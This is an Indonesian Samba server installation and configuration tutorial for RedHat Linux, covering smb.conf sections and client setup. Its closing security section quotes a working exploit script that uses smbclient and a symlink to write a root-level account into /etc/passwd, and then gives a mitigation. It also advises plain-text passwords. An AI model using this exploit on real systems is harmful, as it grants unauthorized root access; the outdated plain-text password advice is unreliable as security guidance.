id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza
Installasi
Untuk membangun Samba Server, harus dipastikan dulu bahwa paket-paket Samba
sudah diinstall. Untuk memeriksa dapat menggunakan perintah :
rpm –qa | grep samba
Apabila paket-paket Samba sudah diinstall maka keluaran dari perintah di atas adalah
:
samba-common-version.i386.rpm
samba-version.i386.rpm
samba-client-version.i386.rpm
Apabila perintah di atas tidak mengeluarkan output, artinya paket-paket Samba belum
diinstall. Untuk melakukan penginstallan paket-paket tersebut digunakan perintah :
rpm –ivh samba-common-version.i386.rpm
rpm –ivh samba-version.i386.rpm
rpm –ivh samba-client-version.i386.rpm
Paket samba-version.i386.rpm dan samba-common-version.i386.rpm adalah paket
untuk Samba Server. Sedangkan samba-client-version.i386.rpm merupakan paket
untuk Samba client. Samba client digunakan untuk mengakses Samba Server atau
untuk mengakses drive dan printer yang disharing pada mesin dengan sistem operasi
MS Windows.
Setelah paket-paket samba diinstall, agar mesin Linux menjadi Samba Server perlu
dihidupkan service Samba Server tersebut. Untuk melihat status digunakan perintah :
/etc/rc.d/init.d/smb status
Sedangkan untuk menghidupkan service Samba Server digunakan perintah :
/etc/rc.d/init.d/smb start
dan untuk mematikan service digunakan perintah :
/etc/rc.d/init.d/smb stop
Setelah melakukan modifikasi konfigurasi pada file smb.conf maka untuk mengaktifkan
perubahan tersebut, Samba Server perlu di restart dengan perintah :
/etc/rc.d/init.d/smb restart
Konfigurasi
Konfigurasi Samba Server terletak pada file smb.conf. Pada Linux RedHat biasanya
file ini terletak pada direktori /etc atau /etc/samba. Penulisan konfigurasi pada file
http://upk.fi.itb.ac.id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza
ini tidak bersifat case sensitive, jadi tidak ada perbedaan pemakainan huruf besar dan
kecil. Tanda # dan ; pada file ini digunakan untuk memberikan komentar atau untuk
menonaktifkan suatu baris pada file agar tidak dijalankan.
Pada smb.conf, secara garis besar tiga bagian penting yaitu :
[global]
[homes]
[printers]
Konfigurasi [global]
Bagian ini berisi pendefinisian parameter-parameter yang digunakan oleh seluruh
bagian-bagian pada file ini.
[global]
workgroup = Asisten
server-string = UPK Samba Server
printcap name = /etc/printcap
load printers = yes
log file = /var/log/samba/log.%m
max log size = 50
security = user
socket option = TCP_NODELAY
Penjelasan untuk tiap baris yang terdapat pada bagian [global] adalah sebagai
berikut :
1. Baris pertama yaitu Asisten merupakan nama workgroup atau nama domain bagi
Windows NT. Nama ini akan saat Network Neighborhood di-browse.
2. Baris kedua merupakan penjelasan atau deskripsi yang diberikan untuk Samba
Server.
3. Baris ketiga /etc/printcap digunakan untuk menentukan file printcap yang akan
digunakan oleh printer yang ada di Linux.
4. Baris keempat dignakan untuk keperluan sharing printer kepada client secara
otomatis setiap kali service Samba Server dihidupkan.
5. Baris kelima merupakan nama file log yang akan digunakan saat client melakukan
koneksi ke Samba Server. Tanda %m menyatakan nama untuk client. Sebagai
contoh, apabila komputer client bernama darksides sedang melakukan koneksi ke
server maka file log-nya akan bernama /var/log/samba/log.darksides.
6. Baris keenam merupakan batasan yang digunakan untuk menentukan ukuran
maksimum file log dalam ukuran KB.
7. Baris keenam adalah bagian yang digunakan untuk proses autentikasi client.
Bagian ini memiliki beberapa kemungkinan, yaitu:
user
share
server
Apabila security diset ke user atau server, Samba Server akan meminta user
untuk memasukkan username dan password yang sama dengan username dan
password yang terdaftar pada server pada saat user mengakses Samba Server.
Sedangkan apabila security diset ke share maka Samba Server akan meminta
password hanya apabila user ingin mengakses home direktori dari client.
8. Bagian socket option digunakan untuk meningkatkan unjuk kerja Samba.
http://upk.fi.itb.ac.id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza
Apabila service Samba Server dihidupkan maka dipastikan bahwa nama mesin Samba
Server akan dapat dilihat pada saat Network Netborhood di-browse.
Konfigurasi [homes]
Bagian ini digunakan untuk menentukan home direktori yang dapat diakses dari
Windows atau mesin Samba client. Sehingga setiap user yang memiliki login di Linux
dapat mengakses home direktori-nya dari Windows atau mesin Samba client. Berikut
adalah konfigurasi pada bagian [homes] :
[homes]
comment = Home direktori user
browseable = yes
writeable = yes
[Data FTP]
comment = Data FTP
path = /private/data/ftp
guest ok = yes
writable = no
share modes = no
Pada konfigurasi ini ditentukan path yang ingin disharing yaitu di /private/data/ftp
yaitu home direktori dari FTP Server.
http://upk.fi.itb.ac.id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza
Gambar 3. Home direktori FTP Server yand di-sharing dengan nama Data FTP
Konfigurasi [printer]
Apabila pada Linux sudah terinstall sebuah printer atau lebih. Maka untuk sharing
printer tersebut agar bisa digunakan oleh komputer client harus dilakukan konfigurasi
pada bagian ini. Berikut adalah konfigurasi untuk bagian ini
[printers]
comment = UPK Printer
path = /var/spool/samba
browseable = no
guest ok = no
printable = yes
Penjelasan konfigurasi di atas adalah sebagai berikut :
1. Baris pertama digunakan untuk komentar atau keterangan untuk printer.
2. Baris kedua menyatakan direktori file spool untuk printer.
3. Baris ketiga digunakan untuk menentukan apakah printer dapat di-browse dari
browser.
4. Baris keempat digunakan untuk memberikan izin kepada user agar dapat
memanfaatkan printer tanpa harus memasukkan password.
5. Baris terakhir merupakan bagian yang penting karena bagian ini akan menentukan
apakah printer dapat dipakai untuk mencetak atau tidak.
Konfigurasi pada komputer client
Apabila pada bagian [global] untuk bagian security diset ke user, artinya komputer
client akan memberikan plain-text-password bersama dengan nama user. Agar
komputer client yang memakai sistem operasi MS Windows mengirim password
dengan format plain-text perlu dilakukan modifikasi pada registry. Langkah-langkah
yang dilakukan untuk melakukan modifikasi adalah sebagai berikut :
1. Jalankan regedit untuk menampilkan Windows Registry editor.
http://upk.fi.itb.ac.id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza
Keamanan
Bagian ini merupakan tambahan yang harus diperhatikan bagi pengguna server Samba
Server pada sistem operasi Linux RedHat. Berikut adalah script yang didapat dari
Internet :
#!/bin/sh
ln -s /etc/passwd /tmp/x.log
smbclient //localhost/"`perl -e '{print "\n\nreza::0:0::/:/bin/sh\n"}'`"
-n ../../../tmp/x -N
Dengan script di atas seorang user biasa dapat melakukan penulisan ke file
/etc/passwd dan melakukan penambahan user yang setingkat root (UID=0 dan
GID=0). Dengan modifikasi pada script tersebut tidak tertutup kemungkinan user
tersebut melakukan sesuatu yang cuma bisa dilakukan oleh root.
Langkah awal pengamanan untu masalah ini adalah melakukan pembatasan
penggunaan utilitas smbclient. Sebagai contoh smbclient hanya bisa digunakan oleh
group tertentu saja yang bisa dipercaya. Misalnya smbclient hanya bisa digunakan
oleh user pada group admin. Berikut adalah langkah yang dilakukan agar utilitas
smbclient hanya bisa digunakan oleh user pada group admin saja.
chown root.admin `which smbclient`
chmod 750 `which smbclient`
Selain di atas, masih banyak lagi masalah keamanan yang mungkin dimiliki oleh
service Samba Server yang sudah didokumentasi di internet. Hal itu menjadi seorang
administrator untuk mencari tahu demi keamanan sistem yang dikelola.